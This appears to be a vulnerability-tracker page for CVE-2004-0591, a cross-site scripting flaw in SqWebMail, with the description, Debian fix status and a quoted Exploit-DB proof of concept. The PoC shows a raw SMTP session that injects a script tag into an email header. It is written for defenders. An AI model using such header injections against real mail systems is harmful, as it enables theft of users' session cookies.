CVE-2004-0591

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Cross-site scripting (XSS) vulnerability in the print_header_uc function for SqWebMail 4.0.4 and earlier, and possibly 3.x, allows remote attackers to inject arbitrary web script or HRML via (1) e-mail headers or (2) a message with a "message/delivery-status" MIME Content-Type.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-24227 webapps php verified text · 1 KB

Luca Legato · 2004-06-21

SqWebMail 4.0.4.20040524 - Email Header HTML Injection

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/10588/info

SqWebMail is reported to be prone to an email header HTML injection vulnerability. This issue presents itself due to a failure of the application to properly sanitize user-supplied email header strings.

The problem presents itself when an unsuspecting user views an email message containing malicious HTML and script code in the email header. 

An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials.

1) sending a raw email message with malformed headers, i.e.
"<script>alert(document.location)</script>":

ashanti@dns:~$ telnet localhost 25
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220 x.x.x.x ESMTP
helo foo
250 x.x.x.x
mail from:<test@test.com>
250 ok
rcpt to:<user@mediaservice.net>
250 ok
data
354 go ahead
<script>alert(document.location)</script>
.
[...]

2) sending a raw email message with the MIME Content-Type header set to
"message/delivery-status" with malformed content (see 1 above).

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`0.45.4-4`
sid	Fixed	`0.45.4-4`
forky	Fixed	`0.45.4-4`
bullseye	Fixed	`0.45.4-4`
bookworm	Fixed	`0.45.4-4`

References

https://security-tracker.debian.org/tracker/CVE-2004-0591

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.